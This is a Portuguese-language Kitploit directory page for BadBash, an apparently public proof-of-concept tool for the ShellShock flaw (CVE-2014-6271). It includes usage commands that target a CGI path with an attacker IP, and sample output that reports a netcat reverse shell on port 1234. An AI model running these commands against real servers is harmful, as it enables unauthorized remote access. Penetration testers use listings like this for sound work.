Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
BadBash — CVE-2014-6271 (ShellShock) RCE PoC tool | Kitploit
Ferramentas/GitHubGitHub/securusglobal/badbash
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubsecurusglobal/badbash

BadBash

CVE-2014-6271 (ShellShock) RCE PoC tool

Ver Repositório
411há 11 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

BadBash

CVE-2014-6271 (ShellShock) Ferramenta de PoC RCE

======= BadBash é uma ferramenta de exploração RCE para CVE-2014-6271. A versão básica apenas verifica o site CGI HTTP e fornece apenas um shell reverso netcat na porta 1234.

Desenvolvedor : Andy Yang Versão : 0.1.0 Licença : GPLv3

Projeto original no GitHub : https://github.com/RainMak3r/Rainstorm

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - Ferramenta RCE para CVE-2014-6271 por Andy Yang Versão básica apenas verifica site HTTP Versão básica apenas fornece shell reverso netcat na porta 1234

EXEMPLO DE USO:

root@kitploit:~
 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path            Caminho completo da página CGI
-d, --Destination IP             Seu endereço IP que escuta uma conexão de entrada
-h, --help                       Exibir ajuda

================================================================================================ Exemplo de uso.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] Verificando se o alvo é vulnerável........

[Info] Isso pode levar até 10 segundos........

[Info] Alvo está vulnerável!!!

[Info] Por favor, use NC para escutar na porta 1234 para shell reverso..........

[Info] Explorando para um shell reverso conectar 172.16.189.1:1234 via netcat ..........

Baixar ferramenta